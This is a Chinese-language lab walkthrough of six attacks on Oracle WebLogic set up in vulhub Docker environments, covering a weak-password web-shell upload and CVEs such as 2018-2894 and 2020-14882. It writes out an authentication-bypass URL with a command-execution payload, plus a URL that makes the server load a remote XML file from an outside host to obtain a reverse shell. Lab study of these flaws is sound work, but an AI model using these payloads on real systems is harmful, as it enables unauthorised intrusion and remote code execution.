一、后台弱⼝令GetShell
1.环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
2.访问网站并登陆后台
/console/login/LoginForm.jsp 默认账号密码:weblogic/Oracle@123

3.点击部署,点击安装,点击上传文件

4.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传

然后⼀直下⼀步,直到完成

5. 访问部署好的war

二、CVE-2017-3506
1.环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
2. 验证是否存在wls-wsat组件
/wls-wsat/CoordinatorPortType
3.在当前页面抓包之后,添加下⾯请求包,反弹shell

三、 CVE-2019-2725
1.漏洞验证 ,访问/_async/AsyncResponseService 如果出现以下页面,则说明存在漏洞

2.在当前页面抓包 , 修改请求包 , 写⼊shell

3.访问下载到weblogic服务器上的木马,并进行连接


四、 CVE-2018-2628
1.环境搭建
cd vulhub-master/weblogic/CVE-2018-2628
docker-compose up -d
2. 访问网站

3. 利用工具

五、 CVE-2018-2894
1.环境搭建
cd vulhub-master/weblogic/CVE-2018-2894
docker-compose up -d
2. 访问/console/login/LoginForm.jsp,获取密码: docker-compose logs | grep password

3.设置web服务测试开启: 域结构 -> base-domain -> 高级 -> 启动Web服务测试页

3.点击保存 , 进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录,访问这个⽬ 录是⽆需权限的,这⼀点很重要
访问/ws_utc/config.do
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4. 点击安全 , 点击添加

右键审查元素 , 找到对应时间戳

5.工具连接
/ws_utc/css/config/keystore/1726815031601_2.jsp

六、 CVE-2020-14882
1.环境搭建
cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
2.访问管理控制台
/console/login/LoginForm.jsp

3. 使⽤以下url绕过登录认证
/console/css/%252e%252e%252fconsole.portal

4.首先访问以下 URL http://121.40.229.129:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")

进⼊到docker中可以看到命令已经成功运⾏了
**方式二:1.**制作⼀个恶意XML⽂件,将其提供到Weblogic可以访问得服务器上
2.然后通过以下 URL,Weblogic 将加载此 XML 并执⾏其中的命令
http://192.168.190.134:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.File SystemXmlApplicationContext("http://121.40.229.129:7001/1.xml")
成功接收到反弹的shell